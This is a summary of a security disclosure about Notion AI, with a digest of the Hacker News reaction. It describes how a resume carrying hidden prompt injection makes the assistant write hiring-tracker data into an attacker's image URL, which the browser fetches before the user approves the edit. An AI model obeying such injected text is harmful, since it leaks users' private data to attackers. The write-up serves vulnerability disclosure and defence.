Notion AI Pre-Approval Edits Enable Prompt-Injection Data Exfiltration

Notion AI applies AI-driven edits before user approval, allowing prompt-injected content to exfiltrate data by inserting external image URLs that the browser fetches immediately. The attack was shown using a hidden-injection resume to leak hiring tracker details, and a related exposure exists in Notion Mail’s drafting assistant. While organizations can reduce risk with settings and practices, the authors argue Notion must implement stronger, platform-level defenses; their disclosure was closed as Not Applicable and then publicly released.
Key Points
- Notion AI saves and renders AI edits before user approval, enabling indirect prompt injection to exfiltrate data via external image requests.
- A poisoned resume instructs Notion AI to embed hiring-tracker contents into an attacker-controlled image URL; the browser fetch leaks the data regardless of user consent.
- Notion’s LLM-based document scanning can be bypassed; injections can reside in uploads, web pages, Notion pages, or connected data sources.
- Notion Mail’s drafting assistant also renders external Markdown images in drafts, creating a narrower but real exfiltration path.
- Mitigations for users/orgs reduce risk but don’t eliminate it; the authors recommend Notion block external image rendering in AI outputs, enforce strong CSP, and fix CDN redirect issues.
Sentiment
The overall sentiment of the Hacker News discussion is highly critical and concerned. Commenters largely agree with the article's findings and express significant dissatisfaction with Notion's security practices, particularly their handling of the vulnerability disclosure. There's a strong undercurrent of distrust towards SaaS platforms and AI integrations, leading to calls for greater accountability and consideration of self-hosted or native alternatives.
In Agreement
- Securing LLMs presents a fundamentally different challenge due to the 'infinite' attack space of human language, requiring outputs to be treated as untrusted and necessitating classic cybersecurity guardrails like sandboxing and data permissioning.
- The vulnerability is an instance of the 'Lethal Trifecta' (access to private data, untrusted input, and external communication), where Markdown images are a frequently overlooked vector for data exfiltration.
- Notion's handling of the vulnerability demonstrates 'sloppy coding' by rendering potentially dangerous links without user permission and an even worse response in closing the disclosure as 'Not Applicable'.
- Notion has a concerning pattern of not taking AI security seriously, as evidenced by previous data exfiltration vulnerabilities identified in their 3.0 agents release.
- There's a broader systemic issue with companies that fail to secure user data and a lack of effective societal mechanisms to hold them proportionally accountable.
- The core problem lies in web browsers accessing URLs without explicit user permission, leading to calls for a return to desktop software for enhanced security and control.
Opposed
- There were no direct opposing viewpoints to the article's findings or the existence of the vulnerability. Some commenters offered broader philosophical takes on LLM security or alternative solutions, but none disputed the claims made in the article.